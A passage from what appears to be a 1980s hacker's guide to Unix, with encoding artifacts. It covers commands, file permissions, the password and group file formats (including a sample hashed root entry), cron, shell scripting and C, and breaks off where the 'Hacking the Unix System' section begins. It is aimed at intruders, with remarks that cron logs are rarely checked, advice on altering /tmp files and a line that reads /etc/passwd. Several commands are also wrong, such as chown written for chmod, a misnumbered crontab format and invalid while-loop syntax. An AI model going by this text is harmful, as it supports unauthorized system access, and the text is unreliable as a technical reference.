=09format is "passwd <account>". You must have superuser capabilities=
to
=09change the password for any account other than the one you are log=
ged
=09in under. To change the password of the account you are currently
=09using, simply type "passwd". You will then be prompted to enter th=
e
=09current password. Next, you will be asked to enter the new passwor=
d.
=09Then you will be asked to verify the new password. If you verify t=
he
=09old password correctly, the password change will be complete. (Not=
e:
=09some systems use a security feature which forces you to use at lea=
st
=092 non-alphanumeric characters in the password. If this is the case=
with
=09the system you are on, you will be informed so if you try to enter=
a
=09new password that does not contain at least 2 non-alphanumeric cha=
r-
=09acters.)
su -This command is used to temporarily assume the id of another=
account.
=09the format is "su <account>". If you don't specify an account, the
=09default root is assumed. If the account has no password, you will =
then
=09assume that account's identity. If it does have a password, you wi=
ll
=09be prompted to enter it. Beware of hacking passwords like this, as=
the
=09system keeps a log of all attempted uses, both successful and un-
=09successful, and which account you attempted to access.
mkdir -This command creates a directory. the format is "mkdir <dirn=
ame>".
rmdir -This command deletes a directory. The directory must be empt=
y first.
=09The format is "rmdir <dirname>".
mv -Renames a file. The syntax is "mv [oldname] [newname]". You =
can use
=09full pathnames, but the new name must have the same pathname as th=
e
=09old name, except for the filename itself.
---------------------------------------------------------------------=
----------
=09Further help can usually be gained from the system itself. Most sy=
stems=20
feature on-line entries from the Unix System User's Manual. You can r=
ead these=20
entries using the man command. The format is "man <command>". Some Un=
ix System=20
V systems also feature a menu-driven help facility. Simply type "help=
" to=20
access it. This one will provide you with a list of commands, as well=
as with=20
the manual entries for the commands.
---------------------------------------------------------------------=
----------
UNIX FILE AND DIRECTORY PROTECTIONS
-----------------------------------
=09Every Unix account is assigned a specific user number, and a group=
=20
number. This is how the system identifies the user. Therefore, 2 acco=
unts with=20
different usernames but the same user number would be considered by t=
he system=20
to be the same id. These user and group numbers are what Unix uses to=
determine=20
file and directory access privileges.
=09Unix has three different file/directory permissions: read, write, =
and=20
execute. This how these permissions affect access to files:
read -Allows a user to view the contents of the file.
write -Allows a user to change the contents of a file.
execute -Allows a user to execute a file (if it is an executable type=
of file;
=09if it isn't, the user will get an error when trying to execute it)=
.
This is how these permissions affect access to directories:
read -Allows a user to list out the files in a directory (ls).
write -Allows a user to save and delete files in this directory.
execute -If a user has execute access to a directory, he can go to th=
at dir-
=09ectory with the cd command. If he also has read permission to that=
dir-
=09ectory, he can also copy files from it and gain information on the=
=20
=09permissions for that directory and the files it contains, with the=
"l"
=09option to the ls command, which will be explained soon.
=09Unix divides users into 3 classes: user (the owner of the file or =
dir-
ectory), group (members of the owner's group), and other (anyone who =
doesn't=20
fit into the first two classes). You can specify what permissions to =
give to a=20
file for each class of user.
=09To show the permissions of the files in a directory, use "ls -l". =
This=20
will list the contents of the directory (as in ls), and will show eac=
h's=20
permissions. For example:
=09$ls
=09bin startrek
=09$ ls -l
=09drwxrwxrwx 1 bin sys 12345 Mar 10 01:30 bin
=09-rwxr-xr-- 1 guest users 256 Mar 20 02:25 startrek
=09In the above example, the directory we are in contains a subdirect=
ory=20
called bin and a file called "startrek". Here is an explantion of the=
fields:
The first field contains the file's type and permissions. Look at the=
first=20
field of the first line, "drwxrwxrwx". Note the "d" at the begginning=
. Then see=20
the "-" at the begginging of the first field for the file startrek. T=
his shows=20
the file type. "D" is a directory. "-" is a file. "c" is a device fil=
e. Now,=20
back to the first field of the first line again. Notice the "rwxrwxrw=
x". These=20
are the permissions. The permissions are divided into three groups:
[user][group][other]. R stands for read, w stands for write, and x st=
and for=20
execute. "rwxrwxrwx" means that all three classes of users, owner, gr=
oup, and=20
other, have read, write, and execute permissions to the directory bin=
. Now look=20
at the second line. It reads "rwxr-xr--". Notice the "-"'s in the pla=
ce of some=20
of the permissions. This means that the file was not given that permi=
ssion.=20
Line 2 shows that the owner has read, write, and execute permissions =
for the=20
file startrek, members of the owner's group have read and execute per=
missions=20
but not write (notice the "-" in the place of the group part's w), an=
d all=20
others have only read privileges ("r--"...there are hyphens in the pl=
ace of the=20
others part's w and x).=20
=09Now, let's look at the other fields. The second field is a number =
(in=20
this case, the number is one for each line). This shows the number of=
copies of=20
this file on the system. The third field shows the name of the owner =
of file=20
(or directory). The fourth field shows the username of the owner of t=
he file.=20
The fifth field, which is not shown on some systems, shows the name o=
f the=20
owner's group.The sixth field shows the size of the file. the seventh=
field=20
shows the time and date the file was last modified. the last field sh=
ows the=20
name of the file or directory.
=09The command used to change file/directory permissions is chmod. Th=
ere=20
are 2 ways to change permissions: symbolically and absolutely. This w=
ill=20
explain both.
=09When you change permissions symbolically, only the permissions you=
=20
specify to be added or deleted will be changed. The other permissions=
will=20
remain as they are. The format is:
chown [u, g, or o] [+ or -] [rwx] [file/directory name]
The following abbreviations are used:
u -User (the file or directory's owner)
g -Group (members of the owner's group)
o -Others (all others)
r -Read permission
w -Write permission
x -Execute permission
You use u, g, and o to specify which group you wish to change the pri=
vileges=20
for. To add a permission, type "chown [class]+[permissions] [filename=
]". For=20
instance, to add group write permissions to the file startrek, type "=
chown g+w=20
startrek". To delete permissions, use the "-". For instance, to remov=
e the=20
owner's write access to the file "startrek", type "chown u-w startrek=
".
=09When you set file permissions absolutely, any permissions that you=
do=20
not give the file or directory are automatically deleted. The format =
for=20
setting permissions absolutely is "chown [mode number] filename". You=
determine=20
the mode number by adding together the code numbers for the permissio=
ns you=20
wish to give the file. Here are the permissions and their numbers:
Others execute permission 1
Others write permission 2
Others read permission 4
Group execute permission 10
Group write permission 20
Group read permission 40
User (owner) execute permission 100
User (owner) write permission 200
User (owner) read permission 400
=09There are also two special file modes that can be set only absolut=
ely.=20
These are the UID and GID modes. The UID mode, when applied to an exe=
cutable=20
file, means that when another user executes the file, he executes it =
under the=20
user number of the owner (in other words, he runs the program as if h=
e were the=20
owner of the file). If the file has its GID mode bit set, then when s=
omeone=20
executes the file, his group will temporarily be changed to that of t=
he file's=20
owner. The permission number for the GID mode is 2000, and the number=
for the=20
UID mode is 4000. If the uid bit is set, there will be an "S" in the =
place of=20
the x in the owner permissions section when you check a file's permis=
sions:
-rwSr-xr-x
If the uid bit is set, and the owner of the file has execute permissi=
ons, the S=20
will not be capitalized:
-rwsr-xr-x
If the gid bit is set, the same applies to the x in the section on gr=
oup=20
permissions.
=09A short note here is in order on how these permissions affect supe=
ruser=20
accounts. They don't-unless the owner of the file is root. All superu=
ser=20
accounts have the same user number, which means that the system consi=
ders them=20
all to be the same-that is, they are considered to be the root accoun=
t. Thus,=20
superuser accounts are only bound by the protections of files and dir=
ectories=20
that they own, and they can easily change the permissions of any file=
s and=20
directories that they do not have the access to that they wish.
SPECIAL UNIX FILES
------------------
=09This section will detail the purposes of some files that are found=
on=20
all systems. There are quite a few of these, and knowing their uses a=
nd what=20
format their entries are in is very useful to the hacker.
THE FILES
---------
/etc/passwd -This is the password file, and is THE single most im=
portant=20
=09=09file on the system. This file is where information on the
=09=09system's accounts are stored. Each entry has 7 fields:
=09=09
=09=09username:password:user#:group#:description:home dir:shell
=09=09The first field, naturally, is the account's username. The
=09=09second field is the account's password (in an encrypted form).
=09=09If this field is blank, the account doesn't have a password.=
=20
=09=09The next field is the account's user number. The fourth field
=09=09is the account's group number. The fifth field is for a
=09=09description of the account. This field is used only in the
=09=09password file, and is often just left blank, as it has no
=09=09significance. The sixth field is the pathname of the account's
=09=09home directory, and the last field is the pathname of the=20
=09=09account's shell program. Sometimes you may see an account with
=09=09a program besides the standard shell programs (sh, csh, etc.)
=09=09as its shell program. These are "command logins". These=20
=09=09accounts execute these programs when logging in. For example,
=09=09the "who" command login would have the /bin/who program as its
=09=09shell.
=09=09Here is a typical-looking entry:
=09=09root:hGBfdJYhdhflK:0:1:Superuser:/:/bin/sh
=09=09This entry is for the root account. Notice that the encrypted=
=20
=09=09form of the password is 13 characters, yet the Unix passwords
=09=09are only 11 characters maximum. The last 2 characters are what
=09=09is called a "salt string", and are used in the encryption
=09=09process, which will be explained in more detail later. Now,
=09=09notice the user number, which is zero. Any account with a user
=09=09number of 0 has superuser capabilities. The group number is 1.
=09=09The account description is "superuser". The account's home dir-
=09=09ectory is the root directory, or "/". The account's shell is
=09=09the bourne shell (sh), which is kept in the directory /bin.
=09=09Sometimes you may see an entry in the password field like this:
=09=09:NHFfnldyNjh,21AB:
=09=09Notice the period after the 13th character, followed by 2
=09=09digits and 2 letters. If an account has an entry like this, the
=09=09account has a fixed expiration date on its password. The first
=09=09digit, in this case 2, shows the maximum number of weeks that
=09=09the account can keep the same password. The second digit shows
=09=09how many weeks must pass before the account can change its=20
=09=09password. (This is to prevent users from using the same old
=09=09password constantly by changing the password when forced to and
=09=09then changing it back immediately.) The last 2 characters are
=09=09an encrypted form of when the password was last changed.
=09=09Other unusual password field entries you might encounter are:
=09=09::
=09=09:,21:
=09=09The first entry means that the account has no password. The
=09=09second entry means that the account has no password yet, but
=09=09has a fixed expiration date that wil begin as soon as a pass-
=09=09word is given to it.
=09=09=09Now, for an explanation of how the Unix system encrypts
=09=09the passwords. The first thing any hacker thinks of is trying
=09=09decrypt the password file. This is as close to impossible as
=09=09anything gets in this world. I've often heard other "hackers"
=09=09brag about doing this...this is the biggest lie since Moses
=09=09said "I did it". The encryption scheme is a variation on the
=09=09DES (Data Encryption Standard). When you enter the command
=09=09passwd (to change the password), the system will form a 2
=09=09character "salt string" based on the process number of the=20
=09=09password command you just issued. This 2-character string pro-
=09=09duces a slight change in the way the password is encrypted.
=09=09There are a total of 4096 different variations on the
=09=09encryption scheme caused by different salt string characters.
=09=09This is NOT the same encryption scheme used by the crypt
=09=09utility. The password is NEVER decrypted on the system. When
=09=09you log on, the password you enter at the password prompt is
=09=09encrypted (the salt string is taken from the password file)
=09=09and compared to the encrypted entry in the password file. The
=09=09system generates its own key, and as of yet, I have not
=09=09discovered any way to get the key. The login program does
=09=09not encrypt the password you enter itself, it does so, I=20
=09=09believe, by a system call.
/etc/group -This is the group file. This allows the superuser to=
give
=09=09certain accounts group access to groups other than their own.
=09=09Entries are in the format:
=09 =20
=09 group name:password:group number:users in this group
=09=09The first field is the name of the group. The second is the
=09=09field for the group password. In all my experience with Unix,
=09=09I have never seen the password feature used. The third is the
=09=09group's number. The fourth field is a list of the users who
=09=09group access to this group. (Note: this can include users whose
=09=09group number is different from the number of the group whose
=09=09entry you are reading in the group file.) The usernames are
=09=09separated by commas. Here's an example:
=09=09sys::2:root,sys,adm,lp
=09=09To change to a new group identity, type "newgrp [group]". If
=09=09the group has a password, you must enter the proper password.
=09=09You cannot change to another group if you are not listed as a
=09=09member of that group in the group file.
=09=09
/dev/console -This is the device file for the system console, or t=
he
=09=09system's main terminal.
/dev/tty## -The device files for the system's terminals are usua=
lly in
=09=09the form tty##, such as tty09, and sometimes ttyaa,ttyab, etc.
=09=09Some ways to make use of the Unix system's treatment of devices
=09=09as files will be explored in the section on Hacking Unix. When
=09=09these files are not in use by a user (in other words, no one's
=09=09logged onto this terminal), the file is owned by root. While a
=09=09user is logged onto a terminal, however, ownership of its=20
=09=09device file is temporarily transferred to that account.
/dev/dk## -These are the device files for the system's disks.
login files -There are special files that are in a user's home di=
rectory
=09=09that contain commands that are executed when the user logs in.
=09=09The name of the file depends on what shell the user is using.
=09=09Here are the names of the files for the various shells:
=09=09
=09=09Shell File
=09=09----- ----
=09=09sh .profile
=09=09csh .cshrc
=09=09ksh .login
=09=09rsh .profile
=09=09Some systems also use a file called ".logout" that contains
=09=09commands which are executed upon logoff.
=09=09=09These types of files are called shell scripts, and will
=09=09will be explained in the section on Unix Software Development's
=09=09explanation of shell programming.
/usr/adm/sulog -This is a log of all attempted uses of the su utilit=
y. It
=09=09shows when the attempt was made, what account made it, and
=09=09which account the user attempted to assume, and whether or not
=09=09the attempt was successful.
/usr/adm/loginlog
or
/usr/adm/acct/sum/loginlog- This is a log of all logins to the system=
. This
=09=09only includes the time and the account's username.
mbox -These are files in the home directories of the syste=
m's users,
=09=09that contain all the mail messages that they have saved.
/usr/mail/<user> -These files in the directory /usr/mail are n=
amed after
=09=09=09system accounts. They contain all the unread mail for
=09=09=09the account they are named after.
/dev/null -This is the null device file. Anything written to th=
is file is
=09=09just lost forever. Any attempt to read this file will result in
=09=09an immediate control-D (end of file) character.
/tmp -The directory /tmp provides storage space for temporary file=
s created
=09by programs and other processes. This directory will always have
=09rwxrwxrwx permissions. Examining these files occasionally reveals =
some
=09interesting information, and if you know what program generates th=
em
=09and the format of the information in the file, you could easily ch=
ange
=09the info in the files, thereby changing the outcome of the program=
.
THE CRON UTILITIES
------------------
=09An understanding of the cron utilities will be necessary to unders=
tand=20
certain parts of the section on Hacking Unix. This section will give =
a detailed=20
explanation of the workings of the cron utilities.
=09The cron utility is a utility which carries out tasks which must b=
e
performed on a periodic basis. These tasks, and the times when they a=
re to be=20
carried out, are kept in files in 2 directories: /usr/lib and=20
/usr/spool/cron.
=09The file crontab in the directory /usr/lib contains entries for sy=
stem=20
tasks that must be performed on a periodic basis. The format for the =
entries in=20
this file is:
minute hour dayofmonth monthofyear dayofweek commandstring
The first field is the minutes field. This is a value from 0-59.
The second field is the hour field, a value from 0-23.
The third field is the day of the month, a value from 1-31.
The fifth field is the month of the year, a value from 1-2.
The sixth field is the day of the week, a value from 1-7, with monday=
being 1.
The seventh field is the pathname and any arguments of the task to be=
carried=20
out.
An asterisk in a field means to carry out the task for every value of=
that=20
field. For instance, an asterisk in the minutes field would mean to c=
arry out=20
that task every minute. Here's an example crontab entry:
0 1 * * * /bin/sync
This runs sync command, which is kept in the directory bin, at 1 am e=
very day.
Commands in the file /usr/lib/crontab are performed with root privile=
ges.
=09in the directory /usr/spool/crontabs, you will find files named af=
ter=20
system accounts. These files contain cron entries which are the same =
as those=20
in the file /usr/lib/crontab, but are carried out under the id of the=
user the=20
file is named after. The entries are in the same format.
BEWARE! When modifying cron files- cron activity is logged! All cron =
activity=20
is logged in the file /usr/adm/cronlog. I've found, however, that on =
most=20
systems, this file is almost never checked.
UNIX SOFTWARE DEVELOPMENT
-------------------------
=09The Unix operating system was initially created as an enviroment f=
or=20
software development, and that remains its main use. This section wil=
l detail=20
some of the os's main facilities for software development, the C comp=
iler and=20
shell programming, and their related utilities. A few of the other la=
nguages=20
will be briefly touched upon at the end of this section, also.
SHELL PROGRAMMING
-----------------
=09The shell is more than a simple command interpreter. It is also a=
=20
sophisticated programming tool, with variables, control structures, a=
nd the=20
features of just about any other programming language. Shell programs=
are=20
called scripts. Scripts are just text files which contain the names o=
f commands=20
and programs. When the script is executed, the command and programs w=
hose names=20
it contains are executed as if you had typed in their names from your=
keyboard.=20
There are two ways to execute a shell script: if you have execute per=
mission to=20
it, you can simply type in its name. Otherwise, (if you have read acc=
ess to=20
it), you can type "sh [filename]". Here is a sample shell script:
who
whoami
As you can see, it contains the commands who and whoami. When you exe=
cute it,=20
you will see a list of the system's current users (the output of the =
who=20
command), and which account you are logged in under (the output of th=
e whoami=20
command).
=09This will concentrate solely on shell programming. While shell=
=20
programming is essentially the same with all the shells, there are sl=
ight=20
syntax differences that make shell scripts incompatible with shells t=
hat they=20
were not specifically written for.
SHELL VARIABLES
---------------
=09Like any programming language, the shell can handle variables. To =
set=20
the value of a variable, type:
[variable]=3D[value]
For example:
counter=3D1
This will assign the value "1" to the variable counter. If the variab=
le counter=20
does not already exist, the shell will create it. Note, that there ar=
e no=20
"numeric" variables in shell programming- all the variables are strin=
gs. For=20
instance, we could later type:
counter=3DThis is a string
And counter would now be equal to "This is a string". There is a comm=
and called=20
"expr", however, that will let you treat a variable as a numeric valu=
e, and=20
will be explained later.
=09When setting the value of a variable, you only use the variable na=
me.=20
When you specify a variable as an argument to a command or program, h=
owever,=20
you must precede the variable with a dollar sign. For instance:
user=3Droot
Now, we want to specify user as an argument to the command "ps -u". W=
e would=20
type:
ps -u$user
Which would, of course, display the processes of the user "root".
SPECIAL SHELL VARIABLES
-----------------------
=09There are certain vaiables which are already pre-defined by the sh=
ell,=20
and have special meaning to it. Here is a list of the more important =
ones and=20
their meanings to the shell:
HOME -(Notice the caps. All pre-defined variables are in all-caps.=
) This
=09variable contains the pathname of the user's home directory.
PATH -This is a good time to explain something which makes Unix a =
very
=09unique operating system. In Unix, there are no commands "built-in"=
to
=09the operating system. All the commands are just regular programs. =
The
=09PATH variable contains a list of the pathnames of directories. Whe=
n you
=09type in the name of a command or program, the shell searches throu=
gh
=09the directories listed in the PATH variable (in the order specifie=
d in
=09the variable) until it finds a program with the same name as the n=
ame
=09you just typed in. The format for the list of directories in the P=
ATH
=09variable is:
=09
=09[pathname]:[pathname]:[pathname]...
=09For example, the default searchpath is usually:
=09/bin:/usr/bin:/usr/local
=09A blank entry in the pathname, or an entry for ".", means to check=
the
=09directory the user is currently in. For instance, all these paths
=09contain blank or "." entries:
=09.:/bin:/usr/bin [Notice . at begginning of path]
=09:/bin:/usr/bin [Notice that path begins with :]
=09/bin:/usr/bin: [Note that path ends with : ]
PS1 -This variable contains the shell prompt string. The default =
is usually
=09"$" ("&" if you're using BSD Unix). If you have the "&" prompt, an=
d
=09wish to have the dollar sign prompt instead, just type:
=09PS1=3D$
TERM -This contains the type of terminal you are using. Common ter=
minal
=09types are:
=09
=09ansi vt100 vt52 vt200 ascii tv150
=09And etc... Just type "TERM=3D[termtype]" to set your terminal type=
.
COMMAND LINE VARIABLES
----------------------
=09Command line variables are variables whose values are set to argum=
ents=20
entered on the command line when you execute the shell script. For in=
stance,=20
here is a sample shell script called "repeat" that uses command line =
variables:
echo $1
echo $2
echo $3
The echo command prints out the values following it. In this case, it=
will=20
print out the values of the variables $1, $2, and $3. These are the c=
ommand=20
line variables. For instance, $1 contains the value of the first argu=
ment you=20
entered on the command line, $2 contains the second, $3 contains the =
third, an=20
so on to infinity. Now, execute the script:
repeat apples pears peaches
The output from the "repeat" shell script would be:
apples
pears
peaches
Get the idea?
SPECIAL COMMAND LINE VARIABLES
------------------------------
=09There are 2 special command line variables, $O and $#. $O contains=
the=20
name of command you typed in (in the last example, $O would be repeat=
). $#=20
contains the number of arguments in the command line. (In the last ex=
ample, $#=20
would be 3.)
SPECIAL COMMANDS FOR SHELL PROGRAMS
-----------------------------------
=09These commands were added to the Unix os especially for shell=20
programming. This section will list them, their syntax, and their use=
s.
read -This command reads the value of a variable from the terminal=
. The
=09format is: "read [variable]". For example, "read number". The vari=
able
=09is not preceded by a dollar sign when used as an argument to this =
com-
=09mand.
echo -This command displays information on the screen. For example=
,
=09"echo hello" would display "hello" on your terminal. If you specif=
y
=09a variable as an argument, it must be preceded by a dollar sign, f=
or
=09example "echo $greeting".
trap -This command traps certain events, such as the user being di=
sconnected
=09or pressing the break key, and tells what commands to carry out if=
they
=09occur. The format is: trap "commands" eventcodes. the event codes =
are:
=092 for break key, and 1 for disconnect. You can specify multiple co=
m-
=09mands with the quotation marks, separating the commands with a sem=
i-
=09colon (";"). For example:
=09trap "echo 'hey stupid!'; echo 'don't hit the break key'" 2
=09Would echo "Hey stupid!" and "Don't hit the break key" if the user=
hits
=09the break key while the shell script is being executed.
exit -This command terminates the execution of a shell procedure, =
and ret-
=09urns a diagnostic value to the enviroment. The format is:
=09"exit [value]", where value is 0 for true and 1 for false. The mea=
ning
=09of the value parameter will become clear later, in the section on
=09the shell's provisions for conditional execution. If the shell scr=
ipt
=09being executed is being executed by another shell script, control =
is
=09passed to the next highest shell script.
ARITHMETIC WITH EXPR
--------------------
=09The expr command allows you to perform arithmetic on the shell=
=20
variables, and sends the output to the screen. (Though the output may=
be=20
redirected.) The format is:
expr [arg] [function] [arg] [function] [arg]...
Where [arg] may be either a value, or a variable (preceded by a dolla=
r sign),=20
and [function] is an arithmetic operation, one of the following:
+ -Add.
- -Subtract.
\* -Multiply.
/ -Divide.
% -Remainder from a division operation.
For example:
$ num1=3D3
$ num2=3D5
$ expr num1 + num2
8
$
TEXT MANIPULATION WITH SORT
---------------------------
=09The sort command sorts text by ASCII or numeric value. The command=
=20
format is:
sort [field][option]... file
where file is the file you wish to sort. (The sort command's input ma=
y be=20
redirected, though, just as its output, which is ordinarily to the sc=
reen, can=20
be.) The sort command sorts by the file's fields. If you don't specif=
y any=20
specific field, the first field is assumed. for example, say this fil=
e=20
contained names and test scores:
Billy Bob 10
Tom McKann 5
Doobie Kairful 20
the file's fields would be first name, last name, and score. So, to s=
ort the=20
above file (called "students") by first name, you would issue the com=
mand:
sort students
And you would see:
Billy Bob 10
Doobie Kairful 20
Tom McKann 5
If you wanted to sort the file's entries by another field, say the se=
cond field=20
of the file "students" (last names), you would specify:
sort +1 students
The +1 means to skip ahead one field and then begin sorting. Now, say=
we wanted=20
to sort the file by the 3rd field (scores). We would type:
sort +2 students
to skip 2 fields. But the output would be:
Billy Bob 10
Tom McKann 5
Doobie Kairful 20
Notice that the shorter names came first, regardless of the numbers i=
n the=20
second field. There is a reason for this- the spaces between the seco=
nd and 3rd=20
fields are considered to be part of the 3rd field. You can tell the s=
ort=20
command to ignore spaces when sorting a field, however, using the b o=
ption. The=20
format would be:
sort +2b students
but...another error! The output would be:
Billy Bob 10
Doobie Kairful 20
Tom McKann 5
Why did the value 5 come after 10 and 20? Because the sort command wa=
sn't=20
really sorting by numeric value- it was sorting by the ASCII values o=
f the=20
characters in the third field, and 5 comes after the digits 1 and 2. =
We could=20
specify that the field be treated by its numerical value by specifyin=
g the n=20
option:
sort +2n students
Output:=20
Tom McKann 5
Billy Bob 10
Doobie Kairful 20
Notice that if we use the n option, blanks are automatically ignored.
We can also specify that sort work in the reverse order on a field. F=
or=20
example, if we wanted to sort by last names in reverse order:
sort +1r students
Output:
Tom McKann 5
Doobie Kairful 20
Billy Bob 10
By using pipes, you can direct the output of one sort command to the =
input of=20
yet another sort command, thus allowing you to sort a file by more th=
an one=20
field. This makes sort an excellent tool for text manipulation. It is=
not,=20
however, the only one. Remember, you can use any Unix command or prog=
ram in a=20
shell script, and there are many different commands for text manipula=
tion in=20
Unix, such as grep (described in an earlier section on basic commands=
).=20
Experiment with the different commands and ways of using them.
LOOPING
-------
=09The for/do loop is a simple way to repeat a step for a certain num=
ber=20
of times. The format is:
for [variable] in [values]
do [commands]
done
You do not precede the variable with a dollar sign in this command. T=
he for/do=20
loop works by assigning the variable values from the list of values g=
iven, one=20
at a time. For example:
for loopvar in 1 2 3 5 6 7
do echo $loopvar
done
On the first pass of the loop, loopvar would be assigned the value 1,=
on the=20
second pass 2, on the third pass 3, on the fourth pass 5, on the fift=
h pass 6,=20
and on the sixth pass 7. I skipped the number 4 to show that you do n=
ot have to=20
use values in numerical order. In fact, you don't have to use numeric=
al=20
arguments. You could just as easily have assigned loopvar a string va=
lue:
for loopvar in apples peaches pears
do echo "This pass's fruit is:"
echo $loopvar
done
Note that you can also specify multiple commands to be carried out in=
the do=20
portion of the loop.
SELECTIVE EXECUTION WITH CASE
-----------------------------
=09The case command allows you to execute commands based on the value=
of a=20
variable. The format is:
case [variable] in
=09[value]) commands
=09=09=09commands
=09=09=09commands;;
[value2]) commands
=09=09=09commands;;
[value3]) ...and so on
=09esac
For example:
case $choice in
=091) echo "You have chosen option one."
=09=09echo "This is not a good choice.";;
=092) echo "Option 2 is a good choice.";;
=09*) echo "Invalid option.";;
=09esac
Now, to explain that:
=09If the variable choice's value is "1", the commands in the section=
for=20
the value 1 are carried out until a pair of semicolons (";;") is foun=
d. The=20
same if the value of choice is "2". Now, note the last entry, "*". Th=
is is a=20
wildcard character. This means to execute the commands in this sectio=
n for any=20
other value of choice. Easac signals the end of the list of execution=
options=20
for case.
DETERMINING TRUE/FALSE CONDITIONS WITH TEST
-------------------------------------------
=09The test command tests for various conditions of files and variabl=
es=20
and returns either a true value (0) or a false value (1), which is us=
ed in=20
conjuction with the if/then statements to determine whether or not a =
series of=20
commands are executed. There are several different formats for test, =
depending=20
on what kind of condition you are testing for. When using variables w=
ith test,=20
you must always precede the variable with a dollar sign.
NUMERIC TESTS
-------------
Format:
test [arg1] option [arg2]
the arguments can either be numbers or variables.
OPTIONS TESTS TRUE IF
------- -------------
-eq arg1=3Darg2
-ne arg1<>arg2
-gt arg1>arg2
-lt arg1<arg2
-ge arg1>=3Darg2
-le arg1<=3Darg2
FILETYPE TESTS
-------------
Format:
test [option] file or directory name
OPTIONS TESTS TRUE IF
------- -------------
-s file or directory exists and is not empty
-f the "file" is a file and not a directory
-d the "file" is really a directory
-w the user has write permission to the file/directory
-r the user has read permission to the file/directory
CHARACTER STRING TESTS
----------------------
Format:
test [arg1] option [arg2]
The arguments can be either strings of characters or variables with c=
haracter=20
string values.
OPTIONS TESTS TRUE IF
------- -------------
=3D arg1=3Darg2
!=3D arg<>arg2
A note here about string tests. You must enclose the names of the var=
iables in=20
quotation marks (like "$arg1") if you wish the test to take into cons=
ideration=20
spaces, otherwise space characters are ignored, and " blue" would =
be=20
considered the same as "blue".
TESTING FOR THE EXISTANCE OF A STRING OF CHARACTERS
---------------------------------------------------
Format:
test [option] arg
Arg is a variable.
OPTIONS TESTS TRUE IF
------- -------------
-z variable has a length of 0
-n variable has a length greater than 0
COMBINING TESTS WITH -A AND -O
------------------------------
=09These options stand for "and" (-a) and "or" (-o). They allow you t=
o=20
combine tests, for example:
test arg1 =3D arg2 -o arg1 =3D arg3
means that a true condition is returned if arg1=3Darg2 or arg1=3Darg3=
.
CONDITIONAL EXECUTION WITH IF/THEN/ELSE/ELIF
--------------------------------------------
Format:
if [this condition is true]
then [do these commands]
fi
Example:
if test arg1 =3D arg2
then echo "argument 1 is the same as argument 2"
fi
This is pretty much self-explanatory. If the condition test on the if=
line=20
returns a true value, the the commands following "then" are carried o=
ut until=20
the fi statement is encountered.
Format:
if [this condition is true]
then [do these commands]
else [do these commands]
fi
Again, pretty much self explanatory. The same as the above, except th=
at if the=20
condition isn't true, the commands following else are carried out, un=
til fi is=20
encountered.
Format:
if [this condition is true]
then [do these commands]
elif [this condition is true]
then [do these commands]
fi
The elif command executes another condition test if the first conditi=
on test is=20
false, and if the elif's condition test returns a true value, the com=
mand for=20
its then statement are then carried out. Stands for "else if".
WHILE/DO LOOPS
--------------
Format:
while [this condition is true]
then [do these commands]
done
Repeats the commands following "then" for as long as the condition fo=
llowing=20
"while" is true. Example:
while test $looper !=3D "q"
then read looper
echo $looper
done
while will read the value of the variable looper from the keyboard an=
d display=20
it on the screen, and ends if the value of looper is "q".
SUMMARY
-------
=09This small tutorial by no means is a complete guide to shell=20
programming. Look at shell scripts on the systems you crack and follo=
w their=20
examples. Remember, that you can accomplish a great deal by combining=
the=20
various control structures (such as having an if/then conditional str=
ucture=20
call up a while/do loop if the condition is true, etc.) and by using =
I/O=20
redirection, pipes, etc. My next Unix file will cover more advanced s=
hell=20
programming, and examine shell programming on another popular shell, =
the=20
Berkely C shell.
THE C COMPILER
--------------
=09C is sort of the "official" language of Unix. Most of the Unix=
=20
operating system was written in C, and just about every system I've e=
ver been=20
on had the C compiler. The command to invoke the c compiler is cc. Th=
e format=20
is "cc [filename]", where filename is the name of the file which cont=
ains the=20
source code. (The filename must end in .c) You can create the source =
code file=20
with any of the system's text editors. The include files, stdio.h and=
others,=20
are kept in a directory on the system. You do not have to have a copy=
of=20
these files in your current directory when you compile the file, the =
compiler=20
will search this directory for them. If you wish to include any files=
not in=20
the include library, they must be in your current directory. The comp=
iled=20
output will be a file called "a.out" in your current directory.
COMPILING INDIVIDUAL MODULES
----------------------------
=09If you're working on a very large program, you will probably want =
to=20
break it up into small modules. You compile the individual modules wi=
th the -c=20
option, which only generates the object files for the module. Then, u=
se the=20
link editor to combine and compile the object files. The object files=
will be=20
generated with the same name as the source files, but the file extens=
ion will=20
be changed from .c to .o When you have created all the object files=
for all=20
of the modules, combine them with the ld (link editor) like this:
ld /lib/crtO.o [module] [module]... -lc
which will give you the final, compiled program, in a file named a.ou=
t. For=20
example:
ld /lib/crtO.o part1.o part2.o -lc
You must remeber to include /lib/crtO.o and the -lc parts in the comm=
and, in=20
the order shown. Also, the object files must be specified in the ld c=
ommand=20
in the order that they must be in the program (for instance, if part1=
called=20
part2, part2 can't be BEFORE part1).
CHECKING FOR ERRORS IN C PROGRAMS
---------------------------------
=09The lint command checks for errors and incompatibility errors in C=
=20
source code. Type "lint [c source-code file]". Not all of the message=
s returned=20
by lint are errors which will prevent the program from compiling or e=
xecuting=20
properly. As stated, it will report lines of code which may not be=
=20
transportable to other Unix systems, unused variables, etc.
C BEAUTIFIER
------------
=09The cb (C beautifier) program formats C source code in an easy to =
read,=20
"pretty" style. The format is "cb [file]". The output is to the scree=
n, so if=20
you want to put the formatted source code into a file, you must redir=
ect the=20
output.
SPECIAL C COMMANDS
------------------
=09The Unix C compiler has a command called system that executes Unix=
=20
commands and programs as if you had typed in the commands from the ke=
yboard.=20
The format is:
system("command line")
Where command line is any command line you can execute from the shell=
, such as:
system("cat /etc/passwd")
Another command which performs a similar function is execvp. The form=
at is:
execvp("command")
An interesting trick is to execute a shell program using execvp. This=
will make=20
the program function as a shell.
HACKING THE UNIX SYSTEM
-----------------------
=09This is it, kiddies, the one you've waded through all that rodent=
=20
nonsense for! This section will describe advanced hacking techniques.=
Most of=20
these techniques are methods of defeating internal security (I.E. sec=
urity once=20
you're actually inside the system). There is little to be said on the=
subject=20
of hacking into the system itself that hasn't already been said in th=
e earlier=20
sections on logging in, Unix accounts, and Unix passwords. I will say=
this=20
much- it's easier, and faster, to password hack your way from outside=
the=20
system into a user account. Once you're actually inside the system, y=
ou will=20
find it, using the techniques described in this section, almost easy =
to gain=20
superuser access on most systems. (Not to mention that nothing is qui=
te as=20
rewarding as spending 3 days hacking the root account on a system, on=
ly to=20
receive the message "not on console-disconnecting" when you finally f=
ind the=20
proper password.) If you do not have a good understanding of the Unix=
operating=20
system and some of its more important utilities already, you should r=
ead the=20
earlier parts of this file before going on to this section.
OVERCOMING RSH RESTRICTIONS
---------------------------
